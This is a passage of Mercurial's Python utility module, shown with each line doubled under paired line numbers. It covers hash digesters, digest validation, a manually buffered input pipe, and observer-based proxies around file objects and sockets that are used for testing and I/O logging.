158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
167 DeprecationWarning, r'mercurial')
168
168
169 def nouideprecwarn(msg, version, stacklevel=1):
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
170 """Issue an python native deprecation warning
171
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
173 """
174 if _dowarn:
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
178
179 DIGESTS = {
179 DIGESTS = {
180 'md5': hashlib.md5,
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
182 'sha512': hashlib.sha512,
183 }
183 }
184 # List of digest types from strongest to weakest
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
186
187 for k in DIGESTS_BY_STRENGTH:
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
188 assert k in DIGESTS
189
189
190 class digester(object):
190 class digester(object):
191 """helper to compute digests.
191 """helper to compute digests.
192
192
193 This helper can be used to compute one or more digests given their name.
193 This helper can be used to compute one or more digests given their name.
194
194
195 >>> d = digester([b'md5', b'sha1'])
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
198 ['md5', 'sha1']
199 >>> d[b'md5']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
204 'sha1'
205 """
205 """
206
206
207 def __init__(self, digests, s=''):
207 def __init__(self, digests, s=''):
208 self._hashes = {}
208 self._hashes = {}
209 for k in digests:
209 for k in digests:
210 if k not in DIGESTS:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
212 self._hashes[k] = DIGESTS[k]()
213 if s:
213 if s:
214 self.update(s)
214 self.update(s)
215
215
216 def update(self, data):
216 def update(self, data):
217 for h in self._hashes.values():
217 for h in self._hashes.values():
218 h.update(data)
218 h.update(data)
219
219
220 def __getitem__(self, key):
220 def __getitem__(self, key):
221 if key not in DIGESTS:
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
223 return nodemod.hex(self._hashes[key].digest())
224
224
225 def __iter__(self):
225 def __iter__(self):
226 return iter(self._hashes)
226 return iter(self._hashes)
227
227
228 @staticmethod
228 @staticmethod
229 def preferred(supported):
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
230 """returns the strongest digest type in both supported and DIGESTS."""
231
231
232 for k in DIGESTS_BY_STRENGTH:
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
233 if k in supported:
234 return k
234 return k
235 return None
235 return None
236
236
237 class digestchecker(object):
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
239 size and digests.
240
240
241 d = digestchecker(fh, size, {'md5': '...'})
241 d = digestchecker(fh, size, {'md5': '...'})
242
242
243 When multiple digests are given, all of them are validated.
243 When multiple digests are given, all of them are validated.
244 """
244 """
245
245
246 def __init__(self, fh, size, digests):
246 def __init__(self, fh, size, digests):
247 self._fh = fh
247 self._fh = fh
248 self._size = size
248 self._size = size
249 self._got = 0
249 self._got = 0
250 self._digests = dict(digests)
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
251 self._digester = digester(self._digests.keys())
252
252
253 def read(self, length=-1):
253 def read(self, length=-1):
254 content = self._fh.read(length)
254 content = self._fh.read(length)
255 self._digester.update(content)
255 self._digester.update(content)
256 self._got += len(content)
256 self._got += len(content)
257 return content
257 return content
258
258
259 def validate(self):
259 def validate(self):
260 if self._size != self._got:
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
262 (self._size, self._got))
263 for k, v in self._digests.items():
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
267 (k, v, self._digester[k]))
268
268
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
335 def readline(self, *args, **kwargs):
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
341 lfi = -1
342 if self._buffer:
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
345 self._fillbuffer()
346 if self._buffer:
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
348 size = lfi + 1
349 if lfi < 0: # end of file
349 if lfi < 0: # end of file
350 size = self._lenbuf
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
354 return self._frombuffer(size)
355
355
356 def _frombuffer(self, size):
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
357 """return at most 'size' data from the buffer
358
358
359 The data are removed from the buffer."""
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
360 if size == 0 or not self._buffer:
361 return ''
361 return ''
362 buf = self._buffer[0]
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
364 buf = ''.join(self._buffer)
365
365
366 data = buf[:size]
366 data = buf[:size]
367 buf = buf[len(data):]
367 buf = buf[len(data):]
368 if buf:
368 if buf:
369 self._buffer = [buf]
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
370 self._lenbuf = len(buf)
371 else:
371 else:
372 self._buffer = []
372 self._buffer = []
373 self._lenbuf = 0
373 self._lenbuf = 0
374 return data
374 return data
375
375
376 def _fillbuffer(self, size=_chunksize):
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
378 data = os.read(self._input.fileno(), size)
379 if not data:
379 if not data:
380 self._eof = True
380 self._eof = True
381 else:
381 else:
382 self._lenbuf += len(data)
382 self._lenbuf += len(data)
383 self._buffer.append(data)
383 self._buffer.append(data)
384
384
385 return data
385 return data
386
386
387 def mmapread(fp):
387 def mmapread(fp):
388 try:
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
394 if os.fstat(fd).st_size == 0:
395 return ''
395 return ''
396 raise
396 raise
397
397
398 class fileobjectproxy(object):
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
399 """A proxy around file objects that tells a watcher when events occur.
400
400
401 This type is intended to only be used for testing purposes. Think hard
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
402 before using it in important code.
403 """
403 """
404 __slots__ = (
404 __slots__ = (
405 r'_orig',
405 r'_orig',
406 r'_observer',
406 r'_observer',
407 )
407 )
408
408
409 def __init__(self, fh, observer):
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
411 object.__setattr__(self, r'_observer', observer)
412
412
413 def __getattribute__(self, name):
413 def __getattribute__(self, name):
414 ours = {
414 ours = {
415 r'_observer',
415 r'_observer',
416
416
417 # IOBase
417 # IOBase
418 r'close',
418 r'close',
419 # closed if a property
419 # closed if a property
420 r'fileno',
420 r'fileno',
421 r'flush',
421 r'flush',
422 r'isatty',
422 r'isatty',
423 r'readable',
423 r'readable',
424 r'readline',
424 r'readline',
425 r'readlines',
425 r'readlines',
426 r'seek',
426 r'seek',
427 r'seekable',
427 r'seekable',
428 r'tell',
428 r'tell',
429 r'truncate',
429 r'truncate',
430 r'writable',
430 r'writable',
431 r'writelines',
431 r'writelines',
432 # RawIOBase
432 # RawIOBase
433 r'read',
433 r'read',
434 r'readall',
434 r'readall',
435 r'readinto',
435 r'readinto',
436 r'write',
436 r'write',
437 # BufferedIOBase
437 # BufferedIOBase
438 # raw is a property
438 # raw is a property
439 r'detach',
439 r'detach',
440 # read defined above
440 # read defined above
441 r'read1',
441 r'read1',
442 # readinto defined above
442 # readinto defined above
443 # write defined above
443 # write defined above
444 }
444 }
445
445
446 # We only observe some methods.
446 # We only observe some methods.
447 if name in ours:
447 if name in ours:
448 return object.__getattribute__(self, name)
448 return object.__getattribute__(self, name)
449
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
451
452 def __nonzero__(self):
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
453 return bool(object.__getattribute__(self, r'_orig'))
454
454
455 __bool__ = __nonzero__
455 __bool__ = __nonzero__
456
456
457 def __delattr__(self, name):
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
459
460 def __setattr__(self, name, value):
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
462
463 def __iter__(self):
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
464 return object.__getattribute__(self, r'_orig').__iter__()
465
465
466 def _observedcall(self, name, *args, **kwargs):
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
469 res = getattr(orig, name)(*args, **kwargs)
470
470
471 # Call a method on the observer of the same name with arguments
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
474 fn = getattr(observer, name, None)
475 if fn:
475 if fn:
476 fn(res, *args, **kwargs)
476 fn(res, *args, **kwargs)
477
477
478 return res
478 return res
479
479
480 def close(self, *args, **kwargs):
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
482 r'close', *args, **kwargs)
483
483
484 def fileno(self, *args, **kwargs):
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
486 r'fileno', *args, **kwargs)
487
487
488 def flush(self, *args, **kwargs):
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
490 r'flush', *args, **kwargs)
491
491
492 def isatty(self, *args, **kwargs):
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
494 r'isatty', *args, **kwargs)
495
495
496 def readable(self, *args, **kwargs):
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
498 r'readable', *args, **kwargs)
499
499
500 def readline(self, *args, **kwargs):
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
502 r'readline', *args, **kwargs)
503
503
504 def readlines(self, *args, **kwargs):
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
506 r'readlines', *args, **kwargs)
507
507
508 def seek(self, *args, **kwargs):
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
510 r'seek', *args, **kwargs)
511
511
512 def seekable(self, *args, **kwargs):
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
514 r'seekable', *args, **kwargs)
515
515
516 def tell(self, *args, **kwargs):
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
518 r'tell', *args, **kwargs)
519
519
520 def truncate(self, *args, **kwargs):
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
522 r'truncate', *args, **kwargs)
523
523
524 def writable(self, *args, **kwargs):
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
526 r'writable', *args, **kwargs)
527
527
528 def writelines(self, *args, **kwargs):
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
530 r'writelines', *args, **kwargs)
531
531
532 def read(self, *args, **kwargs):
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
534 r'read', *args, **kwargs)
535
535
536 def readall(self, *args, **kwargs):
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
538 r'readall', *args, **kwargs)
539
539
540 def readinto(self, *args, **kwargs):
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
542 r'readinto', *args, **kwargs)
543
543
544 def write(self, *args, **kwargs):
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
546 r'write', *args, **kwargs)
547
547
548 def detach(self, *args, **kwargs):
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
550 r'detach', *args, **kwargs)
551
551
552 def read1(self, *args, **kwargs):
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
554 r'read1', *args, **kwargs)
555
555
556 class observedbufferedinputpipe(bufferedinputpipe):
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
561 ``bufferedinputpipe`` aware of these operations.
562
562
563 This variation of ``bufferedinputpipe`` can notify observers about
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
565 ``read()`` and ``readline()``.
566 """
566 """
567 def _fillbuffer(self):
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
569
570 fn = getattr(self._input._observer, r'osread', None)
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
571 if fn:
572 fn(res, _chunksize)
572 fn(res, _chunksize)
573
573
574 return res
574 return res
575
575
576 # We use different observer methods because the operation isn't
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
577 # performed on the actual file object but on us.
578 def read(self, size):
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
579 res = super(observedbufferedinputpipe, self).read(size)
580
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
582 if fn:
583 fn(res, size)
583 fn(res, size)
584
584
585 return res
585 return res
586
586
587 def readline(self, *args, **kwargs):
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
591 if fn:
592 fn(res)
592 fn(res)
593
593
594 return res
594 return res
595
595
596 PROXIED_SOCKET_METHODS = {
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
597 r'makefile',
598 r'recv',
598 r'recv',
599 r'recvfrom',
599 r'recvfrom',
600 r'recvfrom_into',
600 r'recvfrom_into',
601 r'recv_into',
601 r'recv_into',
602 r'send',
602 r'send',
603 r'sendall',
603 r'sendall',
604 r'sendto',
604 r'sendto',
605 r'setblocking',
605 r'setblocking',
606 r'settimeout',
606 r'settimeout',
607 r'gettimeout',
607 r'gettimeout',
608 r'setsockopt',
608 r'setsockopt',
609 }
609 }
610
610
611 class socketproxy(object):
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
612 """A proxy around a socket that tells a watcher when events occur.
613
613
614 This is like ``fileobjectproxy`` except for sockets.
614 This is like ``fileobjectproxy`` except for sockets.
615
615
616 This type is intended to only be used for testing purposes. Think hard
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
617 before using it in important code.
618 """
618 """
619 __slots__ = (
619 __slots__ = (
620 r'_orig',
620 r'_orig',
621 r'_observer',
621 r'_observer',
622 )
622 )
623
623
624 def __init__(self, sock, observer):
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
626 object.__setattr__(self, r'_observer', observer)
627
627
628 def __getattribute__(self, name):
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
630 return object.__getattribute__(self, name)
631
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
633
634 def __delattr__(self, name):
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
636
637 def __setattr__(self, name, value):
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
639
640 def __nonzero__(self):
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
641 return bool(object.__getattribute__(self, r'_orig'))
642
642
643 __bool__ = __nonzero__
643 __bool__ = __nonzero__
644
644
645 def _observedcall(self, name, *args, **kwargs):
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
648 res = getattr(orig, name)(*args, **kwargs)
649
649
650 # Call a method on the observer of the same name with arguments
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
653 fn = getattr(observer, name, None)
654 if fn:
654 if fn:
655 fn(res, *args, **kwargs)
655 fn(res, *args, **kwargs)
656
656
657 return res
657 return res
658
658
659 def makefile(self, *args, **kwargs):
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
661 r'makefile', *args, **kwargs)
662
662
663 # The file object may be used for I/O. So we turn it into a
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
667 reads=observer.reads,
668 writes=observer.writes,
668 writes=observer.writes,
669 logdata=observer.logdata,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
670 logdataapis=observer.logdataapis)
671
671
672 def recv(self, *args, **kwargs):
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
674 r'recv', *args, **kwargs)
675
675
676 def recvfrom(self, *args, **kwargs):
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
678 r'recvfrom', *args, **kwargs)
679
679
680 def recvfrom_into(self, *args, **kwargs):
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
682 r'recvfrom_into', *args, **kwargs)
683
683
684 def recv_into(self, *args, **kwargs):
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
686 r'recv_info', *args, **kwargs)
687
687
688 def send(self, *args, **kwargs):
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
690 r'send', *args, **kwargs)
691
691
692 def sendall(self, *args, **kwargs):
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
694 r'sendall', *args, **kwargs)
695
695
696 def sendto(self, *args, **kwargs):
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
698 r'sendto', *args, **kwargs)
699
699
700 def setblocking(self, *args, **kwargs):
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
702 r'setblocking', *args, **kwargs)
703
703
704 def settimeout(self, *args, **kwargs):
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
706 r'settimeout', *args, **kwargs)
707
707
708 def gettimeout(self, *args, **kwargs):
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
710 r'gettimeout', *args, **kwargs)
711
711
712 def setsockopt(self, *args, **kwargs):
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
714 r'setsockopt', *args, **kwargs)
715
715
716 class baseproxyobserver(object):
